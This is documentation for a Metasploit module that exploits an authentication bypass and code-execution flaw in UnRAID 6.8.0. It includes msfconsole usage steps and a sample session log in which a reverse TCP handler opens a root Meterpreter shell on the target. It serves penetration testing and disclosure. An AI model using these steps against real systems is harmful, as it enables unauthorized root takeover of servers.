metasploit-gs/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md

Vulnerable Application

This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password. Only UnRAID 6.8.0 is affected.

Description

This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in auth_request.php and then performs remote code execution as root by abusing the extract function used in the template.php file.

Testing Environment

Download links are provided for reference only and are not maintained by the project. Utilize at your own risk! Setup Unraid 6.8.0 according to the UnRAID Getting Started guide.

Verification Steps

1. Setup UnRAID 6.8.0
2. Start msfconsole
3. use exploit/linux/http/unraid_auth_bypass_exec
4. set RHOST [UNRAID]
5. check
6. run
7. You should get a new root session

Options

TARGETURI : The URI of the Unraid application

Scenarios

msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb
msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173
RHOSTS => 10.10.0.173
msf5 exploit(linux/http/unraid_auth_bypass_exec) > check
[*] 10.10.0.173:80 - The target appears to be vulnerable.
msf5 exploit(linux/http/unraid_auth_bypass_exec) > run

[*] Started reverse TCP handler on 10.10.0.161:4444 
[*] Sending stage (38288 bytes) to 10.10.0.173
[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100
[+] Request timed out, OK if running a non-forking/blocking payload...

meterpreter > getuid
Server username: root (0)